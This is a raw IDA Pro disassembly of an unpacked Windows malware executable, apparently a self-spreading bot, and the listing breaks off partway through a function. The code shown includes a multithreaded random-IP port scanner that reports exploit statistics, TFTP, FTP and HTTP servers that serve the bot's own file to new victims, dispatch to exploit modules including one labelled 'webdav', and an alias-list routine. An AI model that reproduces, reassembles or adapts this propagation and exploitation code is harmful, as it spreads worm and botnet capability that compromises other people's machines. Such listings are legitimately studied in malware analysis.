;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 48DE9C816367515C8187A6AF63B4BE77
; File Name : u:\work\48de9c816367515c8187a6af63b4be77_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001D8C4 ( 121028.)
; Section size in file : 0001D8C4 ( 121028.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_4078FA+4834�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset aScanExploitSta ; "[SCAN]: Exploit Statistics:"
push eax
xor ebx, ebx
call sub_412BB5
cmp dword_42A068, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40106E
push esi
mov esi, offset dword_42A070
loc_401033: ; CODE XREF: sub_401000+6B�j
mov eax, [esi]
push eax
add ebx, eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_412A80
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_401033
pop esi
loc_40106E: ; CODE XREF: sub_401000+2B�j
push dword_479BB0
call sub_40FD16
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_412A80
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
lea eax, [ebp+var_200]
push eax
call sub_401C33
add esp, 38h
pop edi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010CA proc near ; CODE XREF: sub_4078FA+4154�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 9
call sub_4110DA
test eax, eax
pop ecx
jle short loc_401106
mov eax, [ebp+arg_C]
push dword_42D700[eax*8]
call dword_433520
push eax
lea eax, [ebp+var_200]
push offset aScanCurrentIpS ; "[SCAN]: Current IP: %s."
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_401119
; ---------------------------------------------------------------------------
loc_401106: ; CODE XREF: sub_4010CA+13�j
lea eax, [ebp+var_200]
push offset aScanScanNotAct ; "[SCAN]: Scan not active."
push eax
call sub_412BB5
pop ecx
pop ecx
loc_401119: ; CODE XREF: sub_4010CA+3A�j
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
lea eax, [ebp+var_200]
push eax
call sub_401C33
add esp, 18h
leave
retn
sub_4010CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401141 proc near ; CODE XREF: sub_4018D1+52�p
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_94 = byte ptr 9Ch
arg_114 = byte ptr 11Ch
arg_194 = dword ptr 19Ch
arg_1B4 = dword ptr 1BCh
arg_1BC = dword ptr 1C4h
arg_1C0 = dword ptr 1C8h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_1B4]
cmp eax, 0FFFFFFFFh
jz locret_4014F1
imul eax, 3Ch
push ebx
xor ebx, ebx
cmp dword_42A074[eax], ebx
push esi
jz loc_4013DF
push 5
call sub_4110DA
test eax, eax
pop ecx
jnz loc_4014EF
mov eax, dword_42AE44
push edi
push 104h
mov edi, offset dword_42ED14
push edi
push ebx
mov dword_42EF24, eax
mov dword_42EF20, ebx
call ds:dword_41F010 ; GetModuleFileNameA
push 103h
push offset byte_42AED0
mov esi, offset dword_42EE18
push esi
call sub_412C40
mov eax, [ebp+arg_194]
add esp, 0Ch
cmp [ebp+arg_114], bl
mov dword_42ED10, eax
mov eax, [ebp+arg_1BC]
mov dword_42EFA8, eax
push 7Fh
jnz short loc_4011F4
lea eax, [ebp+arg_94]
push eax
push offset dword_42EF28
call sub_412C40
mov dword_42EFAC, 1
jmp short loc_40120B
; ---------------------------------------------------------------------------
loc_4011F4: ; CODE XREF: sub_401141+94�j
lea eax, [ebp+arg_114]
push eax
push offset dword_42EF28
call sub_412C40
mov dword_42EFAC, ebx
loc_40120B: ; CODE XREF: sub_401141+B1�j
add esp, 0Ch
push esi
push edi
push dword_42EF24
lea eax, [ebp+var_204]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_410EEA
add esp, 20h
mov dword_42EF1C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42ED10
push offset sub_410A22
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, dword_42EF1C
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz loc_401327
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset aTftpFailedToSt ; "[TFTP]: Failed to start server, error: "...
push eax
call sub_412BB5
add esp, 0Ch
loc_40128A: ; CODE XREF: sub_401141+1EE�j
lea eax, [ebp+var_204]
push eax
call sub_401C33
pop ecx
call ds:dword_41F004 ; GetTickCount
xor edx, edx
mov ecx, 0F82Fh
div ecx
push 104h
mov edi, offset dword_42EA6C
push edi
push ebx
mov dword_42EC78, ebx
add edx, 400h
mov dword_42EC7C, edx
call ds:dword_41F010 ; GetModuleFileNameA
push 103h
push offset byte_42AED0
mov esi, offset dword_42EB70
push esi
call sub_412C40
mov eax, [ebp+arg_194]
add esp, 0Ch
cmp [ebp+arg_114], bl
mov dword_42EA68, eax
mov eax, [ebp+arg_1BC]
mov dword_42ED00, eax
push 7Fh
jnz short loc_401334
lea eax, [ebp+arg_94]
push eax
push offset dword_42EC80
call sub_412C40
mov dword_42ED04, 1
jmp short loc_40134B
; ---------------------------------------------------------------------------
loc_40131F: ; CODE XREF: sub_401141+1EC�j
push 32h
call ds:dword_41F000 ; Sleep
loc_401327: ; CODE XREF: sub_401141+128�j
cmp dword_42EFB0, ebx
jz short loc_40131F
jmp loc_40128A
; ---------------------------------------------------------------------------
loc_401334: ; CODE XREF: sub_401141+1BF�j
lea eax, [ebp+arg_114]
push eax
push offset dword_42EC80
call sub_412C40
mov dword_42ED04, ebx
loc_40134B: ; CODE XREF: sub_401141+1DC�j
add esp, 0Ch
push esi
push edi
push dword_42EC7C
push dword_42EA68
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aFtpServerStart ; "[FTP]: Server started on: %s:%d, File: "...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_204]
push 6
push eax
call sub_410EEA
add esp, 24h
mov dword_42EC74, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42EA68
push offset sub_402B1D
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, dword_42EC74
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
pop edi
jnz short loc_4013D2
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aFtpFailedToSta ; "[FTP]: Failed to start server, error: <"...
jmp loc_4014D3
; ---------------------------------------------------------------------------
loc_4013CA: ; CODE XREF: sub_401141+297�j
push 32h
call ds:dword_41F000 ; Sleep
loc_4013D2: ; CODE XREF: sub_401141+276�j
cmp dword_42ED08, ebx
jz short loc_4013CA
jmp loc_4014E2
; ---------------------------------------------------------------------------
loc_4013DF: ; CODE XREF: sub_401141+25�j
cmp dword_42A078[eax], ebx
jz loc_4014EF
push 4
call sub_4110DA
test eax, eax
pop ecx
jnz loc_4014EF
push 104h
mov esi, offset dword_42E944
push esi
push ebx
call ds:dword_41F010 ; GetModuleFileNameA
push 5Ch
push esi
call sub_412C10
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40141D
mov [eax], bl
loc_40141D: ; CODE XREF: sub_401141+2D8�j
mov eax, dword_42AE48
mov dword_42EA48, eax
lea eax, [ebp+arg_94]
push eax
push offset dword_42E6BC
mov dword_42EA5C, ebx
call sub_412BB5
mov eax, [ebp+arg_194]
pop ecx
pop ecx
mov ecx, [ebp+arg_1BC]
push esi
push dword_42EA48
mov dword_42EA54, ecx
mov ecx, [ebp+arg_1C0]
push eax
mov dword_42E6B8, eax
mov dword_42EA58, ecx
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_410EEA
add esp, 20h
loc_401495: ; DATA XREF: .data:off_42BB98�o
; .data:off_42C450�o
mov dword_42EA50, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42E6B8
push offset sub_403E06
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, dword_42EA50
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_4014FB
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedToS ; "[HTTPD]: Failed to start server, error:"...
loc_4014D3: ; CODE XREF: sub_401141+284�j
lea eax, [ebp+var_204]
push eax
call sub_412BB5
add esp, 0Ch
loc_4014E2: ; CODE XREF: sub_401141+299�j
; sub_401141+3C2�j
lea eax, [ebp+var_204]
push eax
call sub_401C33
pop ecx
loc_4014EF: ; CODE XREF: sub_401141+35�j
; sub_401141+2A4�j ...
pop esi
pop ebx
locret_4014F1: ; CODE XREF: sub_401141+12�j
leave
retn
; ---------------------------------------------------------------------------
loc_4014F3: ; CODE XREF: sub_401141+3C0�j
push 32h
call ds:dword_41F000 ; Sleep
loc_4014FB: ; CODE XREF: sub_401141+384�j
cmp dword_42EA64, ebx
jz short loc_4014F3
jmp short loc_4014E2
sub_401141 endp
; =============== S U B R O U T I N E =======================================
sub_401505 proc near ; CODE XREF: sub_40169B:loc_4016FD�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
lea esi, ds:42D700h[esi*8]
push dword ptr [esi]
call dword_433570
inc eax
push eax
call dword_4335C4
mov [esi], eax
pop esi
retn
sub_401505 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401525 proc near ; CODE XREF: sub_40169B+5A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push edi
or edi, 0FFFFFFFFh
mov [ebp+var_4], edi
mov [ebp+var_C], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
lea ecx, [eax+1]
loc_401541: ; CODE XREF: sub_401525+21�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401541
sub eax, ecx
cmp eax, 0Fh
jbe short loc_401556
xor eax, eax
jmp loc_4015FB
; ---------------------------------------------------------------------------
loc_401556: ; CODE XREF: sub_401525+28�j
push esi
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_412D93
add esp, 18h
cmp [ebp+var_4], edi
jnz short loc_4015A0
call sub_412D71
mov esi, 0FFh
jmp short loc_40158D
; ---------------------------------------------------------------------------
loc_401588: ; CODE XREF: sub_401525+79�j
call sub_412D71
loc_40158D: ; CODE XREF: sub_401525+61�j
cdq
mov ecx, esi
idiv ecx
push edx
mov [ebp+var_4], edx
call sub_41013C
test al, al
pop ecx
jnz short loc_401588
loc_4015A0: ; CODE XREF: sub_401525+55�j
cmp [ebp+var_C], edi
mov esi, 100h
jnz short loc_4015B7
call sub_412D71
cdq
mov ecx, esi
idiv ecx
mov [ebp+var_C], edx
loc_4015B7: ; CODE XREF: sub_401525+83�j
cmp [ebp+var_8], edi
jnz short loc_4015C7
call sub_412D71
cdq
idiv esi
mov [ebp+var_8], edx
loc_4015C7: ; CODE XREF: sub_401525+95�j
mov edx, [ebp+var_10]
cmp edx, edi
pop esi
jnz short loc_4015DD
call sub_412D71
cdq
mov ecx, 0FEh
idiv ecx
inc edx
loc_4015DD: ; CODE XREF: sub_401525+A8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
shl edx, 8
add edx, [ebp+var_8]
shl edx, 8
add edx, [ebp+var_C]
shl edx, 8
add eax, edx
mov dword_42D700[ecx*8], eax
loc_4015FB: ; CODE XREF: sub_401525+2C�j
pop edi
leave
retn
sub_401525 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015FE proc near ; CODE XREF: sub_40169B+A9�p
; sub_4028A8+2C�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push ebx
inc edi
push edi
push 2
mov [ebp+var_4], edi
call dword_4334A0
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401627
xor eax, eax
jmp short loc_401696
; ---------------------------------------------------------------------------
loc_401627: ; CODE XREF: sub_4015FE+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_4335EC
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_433444
push 10h
lea eax, [ebp+var_1C]
push eax
push esi
call dword_433458
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push ebx
lea eax, [ebp+var_120]
push eax
push ebx
push ebx
mov [ebp+var_8], ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_433544
push esi
mov edi, eax
call dword_4335AC
xor eax, eax
cmp edi, ebx
setnle al
loc_401696: ; CODE XREF: sub_4015FE+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_4015FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40169B proc near ; DATA XREF: sub_4018D1+144�o
var_3B0 = dword ptr -3B0h
var_394 = dword ptr -394h
var_390 = byte ptr -390h
var_380 = byte ptr -380h
var_300 = dword ptr -300h
var_2FC = byte ptr -2FCh
var_27C = byte ptr -27Ch
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_254 = byte ptr -254h
var_1D4 = byte ptr -1D4h
var_1C4 = byte ptr -1C4h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 74h
mov esi, eax
pop ecx
lea edi, [ebp+var_1D4]
rep movsd
mov edi, [ebp+var_2C]
mov dword ptr [eax+1CCh], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], edi
mov [ebp+arg_0], eax
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
mov ebx, edi
pop ecx
imul ebx, 234h
jmp loc_4018AD
; ---------------------------------------------------------------------------
loc_4016E7: ; CODE XREF: sub_40169B+220�j
cmp [ebp+var_10], 0
push eax
jz short loc_4016FD
lea eax, [ebp+var_1D4]
push eax
call sub_401525
pop ecx
jmp short loc_401702
; ---------------------------------------------------------------------------
loc_4016FD: ; CODE XREF: sub_40169B+51�j
call sub_401505
loc_401702: ; CODE XREF: sub_40169B+60�j
pop ecx
push [ebp+arg_0]
mov esi, eax
push dword_43433C[ebx]
push [ebp+var_3C]
push esi
call dword_433520
push eax
lea eax, [ebp+var_254]
push offset aScanIpSDScanTh ; "[SCAN]: IP: %s:%d, Scan thread: %d, Sub"...
push eax
call sub_412BB5
lea eax, [ebp+var_254]
push eax
lea eax, dword_434138[ebx]
push eax
call sub_412BB5
push [ebp+var_38]
push [ebp+var_3C]
push esi
call sub_4015FE
add esp, 2Ch
cmp eax, 1
jnz loc_4018A2
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_4017D6
push offset dword_42E6A0
call ds:dword_41F01C ; RtlEnterCriticalSection
push [ebp+var_3C]
push esi
call dword_433520
push eax
lea eax, [ebp+var_254]
push offset aScanIpSPortDIs ; "[SCAN]: IP: %s, Port %d is open."
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_4017B8
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_254]
push eax
lea eax, [ebp+var_C0]
jnz short loc_4017AC
lea eax, [ebp+var_140]
loc_4017AC: ; CODE XREF: sub_40169B+109�j
push eax
push [ebp+var_40]
call sub_4045DD
add esp, 14h
loc_4017B8: ; CODE XREF: sub_40169B+EE�j
lea eax, [ebp+var_254]
push eax
call sub_401C33
mov [esp+3B0h+var_3B0], offset dword_42E6A0
call ds:dword_41F018 ; RtlLeaveCriticalSection
jmp loc_4018A2
; ---------------------------------------------------------------------------
loc_4017D6: ; CODE XREF: sub_40169B+BE�j
push esi
call dword_433520
push eax
lea eax, [ebp+var_390]
push eax
call sub_412BB5
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset aWebdav ; "webdav"
push eax
lea eax, [ebp+var_27C]
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_40181A
lea eax, [ebp+var_140]
loc_40181A: ; CODE XREF: sub_40169B+177�j
push eax
lea eax, [ebp+var_2FC]
push eax
call sub_412BB5
mov eax, [ebp+var_144]
pop ecx
mov [ebp+var_300], eax
pop ecx
xor eax, eax
loc_401837: ; CODE XREF: sub_40169B+1AD�j
mov cl, [ebp+eax+var_1C4]
mov [ebp+eax+var_380], cl
inc eax
test cl, cl
jnz short loc_401837
mov eax, [ebp+var_40]
mov [ebp+var_394], eax
mov eax, [ebp+var_18]
mov [ebp+var_260], eax
mov eax, [ebp+var_14]
mov [ebp+var_25C], eax
mov eax, [ebp+var_3C]
mov [ebp+var_270], eax
mov eax, [ebp+var_20]
mov [ebp+var_268], eax
imul eax, 3Ch
sub esp, 140h
push 50h
pop ecx
mov [ebp+var_26C], edi
lea esi, [ebp+var_394]
mov edi, esp
rep movsd
call off_42A06C[eax]
mov edi, [ebp+var_4]
add esp, 140h
loc_4018A2: ; CODE XREF: sub_40169B+B4�j
; sub_40169B+136�j
push 7D0h
call ds:dword_41F000 ; Sleep
loc_4018AD: ; CODE XREF: sub_40169B+47�j
mov eax, dword_43433C[ebx]
cmp dword_42D704[eax*8], 0
jnz loc_4016E7
push edi
call sub_4111AE
pop ecx
push 0
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40169B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4018D1 proc near ; DATA XREF: sub_4078FA+3C68�o
; sub_4078FA+5643�o
var_304 = dword ptr -304h
var_250 = byte ptr -250h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 250h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 74h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_250]
rep movsd
mov dword ptr [eax+1C8h], 1
lea eax, [ebp+74h+var_250]
push eax
call dword_433514
mov ecx, [ebp+74h+var_AC]
sub esp, 1D0h
mov dword_42D700[ecx*8], eax
push 74h
pop ecx
lea esi, [ebp+74h+var_250]
mov edi, esp
rep movsd
call sub_401141
xor ebx, ebx
add esp, 1D0h
cmp [ebp+74h+var_1C0], ebx
jnz short loc_401943
mov eax, dword_432FF4
mov [ebp+74h+var_1C0], eax
loc_401943: ; CODE XREF: sub_4018D1+65�j
push 9
call sub_4110DA
xor edi, edi
inc edi
cmp eax, edi
pop ecx
jnz short loc_4019B3
mov esi, offset dword_42E6A0
push esi
call ds:dword_41F024 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_41F020 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_4019B3
lea eax, [ebp+74h+var_80]
push offset aScanFailedToIn ; "[SCAN]: Failed to initialize critical s"...
push eax
call sub_412BB5
cmp [ebp+74h+var_90], ebx
pop ecx
pop ecx
jnz short loc_40199D
push ebx
push [ebp+74h+var_94]
lea eax, [ebp+74h+var_80]
push eax
lea eax, [ebp+74h+var_1BC]
push eax
push [ebp+74h+var_BC]
call sub_4045DD
add esp, 14h
loc_40199D: ; CODE XREF: sub_4018D1+B0�j
lea eax, [ebp+74h+var_80]
push eax
call sub_401C33
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
add ebp, 74h
leave
retn 4
; ---------------------------------------------------------------------------
loc_4019B3: ; CODE XREF: sub_4018D1+7F�j
; sub_4018D1+9B�j
cmp [ebp+74h+var_A0], edi
mov eax, [ebp+74h+var_AC]
mov esi, ds:dword_41F000
mov dword_42D704[eax*8], edi
jb loc_401A64
loc_4019CC: ; CODE XREF: sub_4018D1+18D�j
push edi
push [ebp+74h+var_AC]
lea eax, [ebp+74h+var_250]
push [ebp+74h+var_B8]
mov [ebp+74h+var_A4], edi
push eax
lea eax, [ebp+74h+var_80]
push offset aScanSDScanThre ; "[SCAN]: %s:%d, Scan thread: %d, Sub-thr"...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+74h+var_80]
push 9
push eax
call sub_410EEA
mov ecx, [ebp+74h+var_AC]
mov [ebp+74h+var_A8], eax
imul eax, 234h
add esp, 24h
push ebx
push ebx
mov dword_43433C[eax], ecx
lea eax, [ebp+74h+var_250]
push eax
push offset sub_40169B
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+74h+var_A8]
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_401A7B
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+74h+var_80]
push offset aScanFailedToSt ; "[SCAN]: Failed to start worker thread, "...
push eax
call sub_412BB5
lea eax, [ebp+74h+var_80]
push eax
call sub_401C33
add esp, 10h
loc_401A56: ; CODE XREF: sub_4018D1+1AF�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+74h+var_A0]
jbe loc_4019CC
loc_401A64: ; CODE XREF: sub_4018D1+F5�j
cmp [ebp+74h+var_B0], ebx
jz short loc_401A89
mov eax, [ebp+74h+var_B0]
imul eax, 0EA60h
push eax
call esi ; Sleep
jmp short loc_401A96
; ---------------------------------------------------------------------------
loc_401A77: ; CODE XREF: sub_4018D1+1AD�j
push 1Eh
call esi ; Sleep
loc_401A7B: ; CODE XREF: sub_4018D1+162�j
cmp [ebp+74h+var_84], ebx
jz short loc_401A77
jmp short loc_401A56
; ---------------------------------------------------------------------------
loc_401A82: ; CODE XREF: sub_4018D1+1C3�j
push 7D0h
call esi ; Sleep
loc_401A89: ; CODE XREF: sub_4018D1+196�j
mov eax, [ebp+74h+var_AC]
cmp dword_42D704[eax*8], 1
jz short loc_401A82
loc_401A96: ; CODE XREF: sub_4018D1+1A4�j
push [ebp+74h+var_B0]
mov eax, [ebp+74h+var_AC]
push [ebp+74h+var_B8]
mov eax, dword_42D700[eax*8]
push eax
call dword_433520
push eax
lea eax, [ebp+74h+var_80]
push offset aScanFinishedAt ; "[SCAN]: Finished at %s:%d after %d minu"...
push eax
call sub_412BB5
add esp, 14h
cmp [ebp+74h+var_90], ebx
jnz short loc_401ADE
push ebx
push [ebp+74h+var_94]
lea eax, [ebp+74h+var_80]
push eax
lea eax, [ebp+74h+var_1BC]
push eax
push [ebp+74h+var_BC]
call sub_4045DD
add esp, 14h
loc_401ADE: ; CODE XREF: sub_4018D1+1F1�j
lea eax, [ebp+74h+var_80]
push eax
call sub_401C33
mov eax, [ebp+74h+var_AC]
mov dword_42D704[eax*8], ebx
mov [esp+290h+var_304], 0BB8h
call esi ; Sleep
push 9
call sub_4110DA
cmp eax, 1
pop ecx
jnz short loc_401B12
push offset dword_42E6A0
call ds:dword_41F024 ; RtlDeleteCriticalSection
loc_401B12: ; CODE XREF: sub_4018D1+234�j
push [ebp+74h+var_AC]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_4018D1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401B23 proc near ; CODE XREF: sub_4078FA+32B1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
xor ebx, ebx
mov edi, offset dword_479030
loc_401B2D: ; CODE XREF: sub_401B23+4D�j
cmp byte ptr [edi], 0
jz short loc_401B74
mov esi, [esp+0Ch+arg_0]
mov eax, edi
loc_401B38: ; CODE XREF: sub_401B23+31�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_401B5A
test cl, cl
jz short loc_401B56
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_401B5A
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_401B38
loc_401B56: ; CODE XREF: sub_401B23+1F�j
xor eax, eax
jmp short loc_401B5F
; ---------------------------------------------------------------------------
loc_401B5A: ; CODE XREF: sub_401B23+1B�j
; sub_401B23+29�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401B5F: ; CODE XREF: sub_401B23+35�j
test eax, eax
jz short loc_401B74
add edi, 0B8h
inc ebx
cmp edi, offset dword_479BB0
jl short loc_401B2D
jmp short loc_401BB5
; ---------------------------------------------------------------------------
loc_401B74: ; CODE XREF: sub_401B23+D�j
; sub_401B23+3E�j
mov esi, ebx
imul esi, 0B8h
push 2Eh
pop ecx
push 17h
push [esp+10h+arg_0]
lea edx, dword_479030[esi]
xor eax, eax
mov edi, edx
push edx
rep stosd
call sub_412C40
push 9Fh
push [esp+1Ch+arg_4]
lea eax, dword_479048[esi]
push eax
call sub_412C40
add esp, 18h
inc dword_42B280
loc_401BB5: ; CODE XREF: sub_401B23+4F�j
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_401B23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401BBB proc near ; CODE XREF: sub_4078FA+461E�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aAliasList ; "-[Alias List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
xor edi, edi
mov esi, offset dword_479030
loc_401BE5: ; CODE XREF: sub_401BBB+72�j
cmp byte ptr [esi], 0
jz short loc_401C20
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_SS ; "%d. %s = %s"
lea eax, [ebp+var_200]
push 200h
push eax
call sub_412E0D
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 2Ch
loc_401C20: ; CODE XREF: sub_401BBB+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_479BB0
jl short loc_401BE5
pop edi
pop esi
leave
retn
sub_401BBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C33 proc near ; CODE XREF: sub_401000+BE�p
; sub_4010CA+6D�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
